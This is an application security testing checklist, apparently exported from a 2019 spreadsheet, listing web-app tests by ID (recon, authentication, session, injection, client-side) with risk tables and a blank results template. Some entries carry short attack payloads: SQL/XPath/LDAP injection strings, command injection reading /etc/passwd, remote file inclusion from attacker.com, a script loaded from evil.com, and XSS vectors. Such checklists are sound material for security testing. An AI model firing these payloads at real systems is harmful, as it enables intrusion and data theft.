APPLICATION SEC

SHEET
Document Information
Project
Document Title Application Security Testing Checklist
Prepared by
Version Number 1
Version Date November 30, 2019

Document Revision History

Date Author Version
### 1

Document Approval
No. Name Position
1 ISGG Chairman

Distribution List
No. Name Position
1
2
3
4
5
Interpretation
Unlikely
Remote
Rare
Periodic
Frequent
Regular

Interpretation
Negligible PXI
Low 25
Considerable 20
High 20
Significant 16
15
Rating Rating 15
1-5 12
6 - 10 12
 11 - 15 10
10
9
Interpretation 8
Very Low 8
Low 6
Medium 6
High 5
Critical 5
4
Description 4
Non-Existent 4
Initial 3
Repeatable 3
Defined 2
Managed 2
Optimal 1
ON SECURITY TESTING

Change
Reference

Comments

Comments
 Heat Map
Impact Probability x 3 x4 x5 x6 x7 x8 x9
5 5 75 100 125 150 175 200 225
5 4 60 80 100 120 140 160 180
4 5 60 80 100 120 140 160 180
4 4 48 64 80 96 112 128 144
5 3 45 60 75 90 105 120 135
3 5 45 60 75 90 105 120 135
4 3 36 48 60 72 84 96 108
3 4 36 48 60 72 84 96 108
5 2 30 40 50 60 70 80 90
2 5 30 40 50 60 70 80 90
3 3 27 36 45 54 63 72 81
4 2 24 32 40 48 56 64 72
2 4 24 32 40 48 56 64 72
3 2 18 24 30 36 42 48 54
2 3 18 24 30 36 42 48 54
5 1 15 20 25 30 35 40 45
1 5 15 20 25 30 35 40 45
4 1 12 16 20 24 28 32 36
2 2 12 16 20 24 28 32 36
1 4 12 16 20 24 28 32 36
3 1 9 12 15 18 21 24 27
1 3 9 12 15 18 21 24 27
2 1 6 8 10 12 14 16 18
1 2 6 8 10 12 14 16 18
1 1 3 4 5 6 7 8 9
G
x 10 x 11 x 12 x 13 x 14 x 15
250 275 300 325 350 375
200 220 240 260 280 300
200 220 240 260 280 300
160 176 192 208 224 240
150 165 180 195 210 225
150 165 180 195 210 225
120 132 144 156 168 180
120 132 144 156 168 180
100 110 120 130 140 150
100 110 120 130 140 150
90 99 108 117 126 135
80 88 96 104 112 120
80 88 96 104 112 120
60 66 72 78 84 90
60 66 72 78 84 90
50 55 60 65 70 75
50 55 60 65 70 75
40 44 48 52 56 60
40 44 48 52 56 60
40 44 48 52 56 60
30 33 36 39 42 45
30 33 36 39 42 45
20 22 24 26 28 30
20 22 24 26 28 30
10 11 12 13 14 15
 APPLICATION SECURITY TESTING
Information
CHECKLIST
Test Name Description Tools Used Result Remark
Gathering

Conduct Search Engine Discovery and Reconnaissance for Use a search engine to search for Network diagrams and Configurations,
IGT-001 Credentials, Error message content.
Information Leakage

Find the version and type of a running web server to determine known
IGT-002 Fingerprint Web Server vulnerabilities and the appropriate exploits. Using
"HTTP header field ordering" and "Malformed requests test".

IGT-003 Review Webserver Metafiles for Information Leakage Analyze robots.txt and identify <META> Tags from website.

Find applications hosted in the webserver (Virtual hosts/Subdomain), non-

IGT-004 Enumerate Applications on Webserver standard ports, DNS zone transfers

Review Webpage Comments and Metadata for Information Find sensitive information from webpage comments and Metadata on
IGT-005 source code.
Leakage

IGT-006 Identify application entry points Identify from hidden fields, parameters, methods HTTP header analysis

IGT-007 Map execution paths through application Map the target application and understand the principal workflows.

Find the type of web application framework/CMS from HTTP headers,

IGT-008 Fingerprint Web Application Framework Cookies, Source code, Specific files and folders.

Identify the web application and version to determine known vulnerabilities

IGT-009 Fingerprint Web Application and the appropriate exploits.

Identify application architecture including Web language, WAF, Reverse

IGT-010 Map Application Architecture proxy, Application Server, Backend Database
Configuration
and Deploy
Test Name Description Tools Result Remark
Management
Testing

Understand the infrastructure elements interactions, config management

CDM-001 Test Network/Infrastructure Configuration for software, backend DB server, WebDAV, FTP in order to identify known
vulnerabilities.

Identify default installation file/directory, Handle Server errors (40*,50*),

CDM-002 Test Application Platform Configuration Minimal Privilege, Software logging.

CDM-003 Test File Extensions Handling for Sensitive Information Find important file, information (.asa , .inc , .sql ,zip, tar, pdf, txt, etc)

Check JS source code, comments, cache file, backup file

CDM-004 Backup and Unreferenced Files for Sensitive Information (.old, .bak, .inc, .src) and guessing of filename

Directory and file enumeration, comments and links in source (/admin,

CDM-005 Enumerate Infrastructure and Application Admin Interfaces /administrator, /backoffice, /backend, etc), alternative server port
(Tomcat/8080)

Identify HTTP allowed methods on Web server with OPTIONS. Arbitrary

CDM-006 Test HTTP Methods HTTP Methods, HEAD access control bypass and XST

Identify HSTS header on Web server through HTTP response header.

CDM-007 Test HTTP Strict Transport Security curl -s -D- https://domain.com/ | grep Strict

Analyse the permissions allowed from the policy files

CDM-008 Test RIA cross domain policy (crossdomain.xml/clientaccesspolicy.xml) and allow-access-from.

Identity
Management Test Name Description Tools Result Remark
Testing

Validate the system roles defined within the application by creating

IMT-001 Test Role Definitions permission matrix.

Verify that the identity requirements for user registration are aligned
IMT-002 Test User Registration Process with business and security requirements:
 Determine which roles are able to provision users and what sort of
IMT-003 Test Account Provisioning Process accounts they can provision.

Generic login error statement check, return codes/parameter values,

IMT-004 Testing for Account Enumeration and Guessable User Account enumerate all possible valid userids (Login system, Forgot password)

User account names are often highly structured (e.g. Joe Bloggs
IMT-005 Testing for Weak or unenforced username policy account name is jbloggs and Fred Nurks account name is fnurks)
and valid account names can easily be guessed.

Guest and Training accounts are useful ways to acquaint potential users
with system functionality prior to them completing the authorisation
IMT-006 Test Permissions of Guest/Training Accounts process required for access.Evaluate consistency between access policy
and guest/training account access permissions.

Verify the identity requirements for user registration align with

IMT-007 Test Account Suspension/Resumption Process business/security requirements. Validate the registration process.

Authentication
Test Name Description Tools Result Remark
Testing
Check referrer whether its HTTP or HTTPs. Sending data through HTTP
AUT-001 Testing for Credentials Transported over an Encrypted Channel and HTTPS.
Testing for default credentials of common applications, Testing for default
AUT-002 Testing for default credentials password of new accounts.
Evaluate the account lockout mechanism’s ability to mitigate
AUT-003 Testing for Weak lock out mechanism brute force password guessing. Evaluate the unlock mechanism’s
resistance to unauthorized account unlocking.
Force browsing (/admin/main.php, /page.asp?authenticated=yes),
AUT-004 Testing for bypassing authentication schema Parameter Modification, Session ID prediction, SQL Injection
Look for passwords being stored in a cookie. Examine the cookies stored
AUT-005 Test remember password functionality by the application. Verify that the credentials are not stored in clear text,
but are hashed. Autocompleted=off?
Check browser history issue by clicking "Back" button after logging out.
AUT-006 Testing for Browser cache weakness Check browser cache issue from HTTP response headers (Cache-
Control: no-cache)
Determine the resistance of the application against brute force
password guessing using available password dictionaries by evaluating
AUT-007 Testing for Weak password policy the length, complexity, reuse and aging requirements of
passwords.
Testing for weak pre-generated questions, Testing for weak self-
AUT-008 Testing for Weak security question/answer generated question, Testing for brute-forcible answers (Unlimited
attempts?)
 Test password reset (Display old password in plain-text?, Send via
AUT-009 Testing for weak password change or reset functionalities email?, Random token on confirmation email ?), Test password change
(Need old password?), CSRF vulnerability ?
Understand the primary mechanism and Identify other channels (Mobile
AUT-010 Testing for Weaker authentication in alternative channel App, Call center, SSO)

Authorization
Test Name Description Tools Result Remark
Testing

dot-dot-slash attack (../), Directory traversal, Local File inclusion/Remote

AUT-011 Testing Directory traversal/file include File Inclusion.

Access a resource without authentication?, Bypass ACL, Force browsing

AUT-012 Testing for bypassing authorization schema (/admin/adduser.jsp)

Testing for role/privilege manipulate the values of hidden variables.

AUT-013 Testing for Privilege Escalation Change some param groupid=2 to groupid=1

AUT-014 Testing for Insecure Direct Object References Force changing parameter value (?invoice=123 -> ?invoice=456)

Session
Management Test Name Description Tools Result Remark
Testing

SessionID analysis prediction, unencrypted cookie transport,

SMT-001 Testing for Bypassing Session Management Schema
brute-force.

Check HTTPOnly and Secure flag, expiration, inspect for sensitive

SMT-002 Testing for Cookies attributes
data.

The application doesn't renew the cookie after a successfully user

SMT-003 Testing for Session Fixation
authentication.

Encryption & Reuse of session Tokens vulnerabilities, Send

SMT-004 Testing for Exposed Session Variables
sessionID with GET method ?
SMT-005 Testing for Cross Site Request Forgery URL analysis, Direct access to functions without any token.

SMT-006 Testing for logout functionality Check reuse session after logout both server-side and SSO.

Check session timeout, after the timeout has passed, all session tokens
SMT-007 Test Session Timeout should be destroyed or be unusable.

The application uses the same session variable for more than one
purpose. An attacker can potentially access pages in an order
SMT-008 Testing for Session puzzling unanticipated by the developers so that the session variable is set in one
context and then used in another.

Data
Validation Test Name Description Tools Result Remark
Testing

Check for input validation, Replace the vector used to identify XSS, XSS
DVT-001 Testing for Reflected Cross Site Scripting with HTTP Parameter Pollution.

Check input forms/Upload forms and analyze HTML codes, Leverage

DVT-002 Testing for Stored Cross Site Scripting XSS with BeEF

Craft custom HTTP requests to test the other methods to bypass URL
DVT-003 Testing for HTTP Verb Tampering authentication and authorization.

Identify any form or action that allows user-supplied input to bypass Input
DVT-004 Testing for HTTP Parameter pollution validation and filters using HPP

DVT-005 Testing for SQL Injection Union, Boolean, Error based, Out-of-band, Time delay.
 /ldapsearch?user=*
DVT-006 Testing for LDAP Injection user=*user=*)(uid=*))(|(uid=*
pass=password

DVT-007 Testing for ORM Injection Testing ORM injection is identical to SQL injection testing

Check with XML Meta Characters

DVT-008 Testing for XML Injection
', " , <>, <!--/-->, &, <![CDATA[ / ]]>, XXE, TAG

• Presense of .shtml extension

• Check for these characters
DVT-009 Testing for SSI Injection
< ! # = / . " - > and [a-zA-Z0-9]
• include String = <!--#include virtual="/etc/passwd" -->

Check for XML error enumeration by supplying a single quote (')

DVT-010 Testing for XPath Injection Username: ‘ or ‘1’ = ‘1
Password: ‘ or ‘1’ = ‘1

• Identifying vulnerable parameters with special characters

(i.e.: \, ‘, “, @, #, !, |)
DVT-011 IMAP/SMTP Injection • Understanding the data flow and deployment structure of the
client
• IMAP/SMTP command injection (Header, Body, Footer)

Enter OS commands in the input field.

DVT-012 Testing for Code Injection ?arg=1; system('id')

LFI with dot-dot-slash (../../), PHP Wrapper (php://filter/convert.base64-

DVT-013 Testing for Local File Inclusion encode/resource)

RFI from malicious URL

DVT-014 Testing for Remote File Inclusion ?page.php?file=http://attacker.com/malicious_page

Understand the application platform, OS, folder structure, relative

path and execute OS commands on a Web server.
DVT-015 Testing for Command Injection
%3Bcat%20/etc/passwd
test.pdf+|+Dir C:\
 • Testing for heap overflow vulnerability
DVT-016 Testing for Buffer overflow • Testing for stack overflow vulnerability
• Testing for format string vulnerability

DVT-017 Testing for Heap overflow

DVT-018 Testing for Stack overflow
DVT-019 Testing for Format string
File Upload, Stored XSS , SQL/XPATH Injection, Misconfigured
DVT-020 Testing for incubated vulnerabilities
servers (Tomcat, Plesk, Cpanel)

param=foobar%0d%0aContent-Length:%200%0d%0a%0d
%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/
DVT-021 Testing for HTTP Splitting/Smuggling
html%0d%0aContent-Length:%2035%0d%0a%0d
%0a<html>Sorry,%20System%20Down</html>

Error Handling Test Name Description Tools Result Remark

Locate error codes generated from applications or web servers. Collect

ERH-001 Analysis of Error Codes sensitive information from that errors (Web Server, Application Server,
Database)

• Invalid Input / Empty inputs

• Input that contains non alphanumeric characters or query syn
ERH-002 Analysis of Stack Traces tax
• Access to internal pages without authentication
• Bypassing application flow

Cryptography Test Name Description Tools Result Remark

Testing for Weak SSL/TSL Ciphers, Insufficient Transport Identify SSL service, Idectify weak ciphers/protocols (ie. RC4, BEAST,
CRY-001 CRIME, POODLE)
Layer Protection

Compare the responses in three different states:

• Cipher text gets decrypted, resulting data is correct.
CRY-002 Testing for Padding Oracle • Cipher text gets decrypted, resulting data is garbled and causes
some exception or error handling in the application logic.
• Cipher text decryption fails due to padding errors.
 Check sensitive data during the transmission:
• Information used in authentication (e.g. Credentials, PINs, Session
CRY-003 Testing for Sensitive information sent via unencrypted channels identifiers, Tokens, Cookies…)
• Information protected by laws, regulations or specific organizational
policy (e.g. Credit Cards, Customers data)

Business logic
Test Name Description Tools Result Remark
Testing

• Looking for data entry points or hand off points between systems or
BLT-001 Test Business Logic Data Validation software.
• Once found try to insert logically invalid data into the application/system.

• Looking for guessable, predictable or hidden functionality of fields.

• Once found try to insert logically valid data into the application/system
BLT-002 Test Ability to Forge Requests allowing the user go through the application/system against the normal
busineess logic workflow.

•Looking for parts of the application/system (components i.e. For example,

input fields, databases or logs) that move, store or handle
data/information.
• For each identified component determine what type of data/information
is logically acceptable and what types the application/system should
BLT-003 Test Integrity Checks guard against. Also, consider who according to the business logic is
allowed to insert, update and delete data/information and in each
component.
• Attempt to insert, update or edit delete the data/information values with
invalid data/information into each component (i.e. input, database, or log)
by users that .should not be allowed per the busines logic workflow.

• Looking for application/system functionality that may

be impacted by time. Such as execution time or actions that
help users predict a future outcome or allow one to circumvent
BLT-004 Test for Process Timing any part of the business logic or workflow. For example, not
completing transactions in an expected time.
• Develop and execute the mis-use cases ensuring that attackers
can not gain an advantage based on any timing.

• Looking for functions or features in the application or system that should

not be executed more that a single time or specified number of times
during the business logic workflow.
BLT-005 Test Number of Times a Function Can be Used Limits • For each of the functions and features found that should only be
executed a single time or specified number of times during the business
logic workflow, develop abuse/misuse cases that may allow a user to
execute more than the allowable number of times.
 • Looking for methods to skip or go to steps in the application process in a
different order from the designed/intended business logic flow.
BLT-006 Testing for the Circumvention of Work Flows • For each method develop a misuse case and try to circumvent or
perform an action that is "not acceptable" per the the business logic
workflow.

Measures that might indicate the application has in-built self-defense:

• Changed responses
BLT-007 Test Defenses Against Application Mis-use • Blocked requests
• Actions that log a user out or lock their account

• Review the project documentation and perform some exploratory testing

looking for file types that should be "unsupported" by the
application/system.
• Try to upload these “unsupported” files an verify that it are properly
BLT-008 Test Upload of Unexpected File Types rejected.
• If multiple files can be uploaded at once, there must be tests in place to
verify that each file is properly evaluated.
PS. file.phtml, shell.phPWND, SHELL~1.PHP

• Develop or acquire a known “malicious” file.

• Try to upload the malicious file to the application/system and verify that it
BLT-009 Test Upload of Malicious Files is correctly rejected.
• If multiple files can be uploaded at once, there must be tests in place to
verify that each file is properly evaluated.

Client Side
Test Name Description Tools Result Remark
Testing

CST-001 Testing for DOM based Cross Site Scripting Test for the user inputs obtained from client-side JavaScript Objects

Inject JavaScript code:

CST-002 Testing for JavaScript Execution www.victim.com/?javascript:alert(1)

Send malicious HTML code:

CST-003 Testing for HTML Injection ?user=<img%20src='aaa'%20onerror=alert(1)>

Modify untrusted URL input to a malicious site: (Open Redirect)

CST-004 Testing for Client Side URL Redirect ?redirect=www.fake-target.site
 Inject code in the CSS context :
• www.victim.com/#red;-o-link:'javascript:alert(1)';-o-link-source:current;
CST-005 Testing for CSS Injection (Opera [8,12])
• www.victim.com/#red;-:expression(alert(URL=1)); (IE 7/8)

External JavaScript could be easily injected in the trusted web site

CST-006 Testing for Client Side Resource Manipulation www.victim.com/#http://evil.com/js.js

Check the HTTP headers in order to understand how CORS is

CST-007 Test Cross Origin Resource Sharing used (Origin Header)

Decompile, Undefined variables, Unsafe methods, Include malicious SWF

CST-008 Testing for Cross Site Flashing (http://victim/file.swf?lang=http://evil

Discover if a website is vulnerable by loading into an iframe, create simple

CST-009 Testing for Clickjacking web page that includes a frame containing the target.

Identify that the application is using WebSockets by inspecting ws:// or

wss:// URI scheme.Use Google Chrome's Developer Tools to view the
CST-010 Testing WebSockets Network WebSocket communication. Check Origin, Confidentiality and
Integrity, Authentication, Authorization, Input Sanitization

Analyse JavaScript code looking for how Web Messaging is implemented.

CST-011 Test Web Messaging How the website is restricting messages from untrusted domain and how
the data is handled even for trusted domains

Determine whether the website is storing sensitive data in the storage.

CST-012 Test Local Storage XSS in localstorage
http://server/StoragePOC.html#<img src=x onerror=alert(1)>

Not Started
Pass
Issues
N/A
 APPLICATION SECURITY TESTING RESU
No. Vulnerability Name Affected Host/Path Impact Likelihood Risk
ITY TESTING RESULTS
Observation/Implication Recommendation Test Evidence